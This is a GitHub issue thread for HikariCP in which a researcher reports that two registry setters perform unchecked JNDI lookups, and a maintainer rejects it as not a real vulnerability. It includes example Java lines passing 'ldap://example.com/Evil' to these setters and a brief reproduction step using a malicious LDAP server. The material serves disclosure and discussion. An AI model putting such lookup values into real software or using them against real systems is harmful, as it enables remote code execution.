### ISSUE TITLE
`setHealthCheckRegistry` and `setMetricRegistry` violate the principle of least privilege, which may lead the code injection vulnerability. 

### ISSUE THREAD

**Issue by LetianYuan** [brettwooldridge/HikariCP#2108]
**Affected Version**
The latest version 5.0.1 and below.

**Describe the vulnerability**
 There are two methods, `com.zaxxer.hikari.HikariDataSource.setHealthCheckRegistry` and `com.zaxxer.hikari.HikariDataSource.setMetricRegistry`, designed to config `healthCheck` and `metricRegistry`. However, passing an unchecked argument to this API can lead to the execution of arbitrary commands. For instance, following codes can lead to the execution of arbitrary commands from attackers:

Example 1:

```Java
HikariDataSource dataSource = new HikariDataSource();
dataSource.setHealthCheckRegistry("ldap://example.com/Evil");
```

Example 2:

```Java
HikariDataSource dataSource = new HikariDataSource();
dataSource.setMetricRegistry("ldap://example.com/Evil");
```

**Root Cause and Potential Danger**

The API is given more power than it should have, namely to just execute `lookup` without checking it. It violates the principle of least privilege. In this case, developers are not aware that the API used to config `healthCheck` and `metricRegistry` could execute arbitrary commands, leading to insufficient parameter validation and command execution.

We believe that this kind of implementation obscures the responsibility of security checks between the developers and the users of libraries, which has been confirmed by some developers. This issue is similar to the previously well-known Log4j2 vulnerability, where few developers knew that logging APIs could result in JNDI injection.

**To Reproduce**
First, establish an LDAP server and provide malicious code. Then, just execute above codes would reproduce it.

**Fix Suggestion**
Filter LDAP, RMI and related protocols when using `lookup`, or refactor `HikariDataSource`.

**Comment by lfbayer** [comment]
The methods of the HikariDataSource are not accessible beyond what the user of the library makes available. There is no risk of those methods being called with unsanitized data unless the library user implements something that allows it to be. So this is not a vulnerability in HikariCP.

In the case of the Log4j2 vulnerability (you are likely referring to Log4Shell), the issue isn't that a programmer was allowed to use ldap, but that log4j would initialize ldap connections simply by having an ldap URL in a message that was being logged.

To have an analogous vulnerability in HikariCP would be if, for example, HikariCP causes String type statement parameters with a value of "ldap://xxx" to cause an ldap lookup to happen. That would be run time data, but the methods you refer to here are not taking any runtime user data unless you as the library user has made such a thing available.

I would only consider this a vulnerability if there was some way for an external actor was able to pass the url in to HikariCP.

I'm marking this ticket as closed. This is not a vulnerability.

**Comment by LetianYuan** [comment]
Much thanks for your reply.

**Comment by LetianYuan** [comment]
@lfbayer 
Much thanks again for your reply. We still have some concerns and want to discuss with you.

First, as you've said, we admit that there is no risk unless the library user implements something dangerous. However, as your library prevails among Java Web developers, it is possible that some users misuse these APIs. For example, a programmer might allow its users to configure different versions (e.g. time ranges or history data) of  `HealthCheck`. So, users might input version numbers. Then version numbers could be directly concatenated to the arguments of `setHealthCheckRegistry`, leading to the injection of paramters. Another example is that, a user makes the parameter of  `setHealthCheckRegistry` available in a configuration file such as `foobar.properties`. That is, an external actor can control `setHealthCheckRegistry` by changing the content of the configuration file. We know that such cases rarely happen and might not be your design purpose, but it is possible anyway. So, we think it's necessary that adding a note to the document emphasizing how to properly use the API. The `setMetricRegistry` API has the similar issue.

Second, is it really necessary to provide such a flexiblity that allows `ldap` protocol? As far as I know, many programmers will not use an LDAP URI to configure the health checks. We think this API violates the principle of least privilege. Many users will not be aware that an LDAP URI can be passed to this API. Therefore, we think it's essential to make a clarification in the document pointing out the potential danger of these APIs and add an LDAP configuration to allow programmers prohibit or permit LDAP URI manually.

This is just our opinion, and we are willing to discuss it with you.

**Comment by lfbayer** [comment]
There are an infinite number of protocols that could be registered in java that JNDI can lookup from. Are you proposing that HikariCP specifically block ldap but not block any others, or are you proposing an allowlist of supported protocols?

**Comment by LetianYuan** [comment]
Not all protocols have the severe consequence of Remote Code Injection. We suggest a blocklist of RMI and LDAP protocol. Also, a detailed document can mitigate this issue.

**Comment by lfbayer** [comment]
This sounds like a theoretic problem rather than a real problem. Do you have a specific use-case where the user rather than the developer is given access to set this URL?

Is your motivation for opening this ticket an actual production issue that you ran into, or is it more of an academic concern?

**Comment by LetianYuan** [comment]
We don't have real-world cases for that. You are right, it is an academic concern, and we'd like to discuss this with you.

Actually, we have found that the LDAP and RMI protocols are unnecessary in most cases, just like the previous well-known log4j2 vulnerability. Therefore, we believe that this API is over-privileged.

Let's take `setHealthCheckRegistry` as an example. Before **Feb 12, 2015**, a `String` object is not allowed to be passed as a parameter (see https://github.com/brettwooldridge/HikariCP/commit/196632b82ebb52211bbecbc09a863ef3460824af). However, related documents have not been updated since **Jan 30, 2015** (see https://github.com/brettwooldridge/HikariCP/wiki/Dropwizard-HealthChecks). The difference between the document and the actual functionality of this API is what we want to emphasize. `HikariCP` users are very possible to lack understanding of this API.

There're two ways to mitigate this issue. Improving the document. And, adding an LDAP/RMI configuration to allow programmers prohibit or permit LDAP/RMI URI manually.

Although we don't have real-world cases temporarily, we think it's necessary to fix this issue before this API becomes a severe problem like the Log4j.
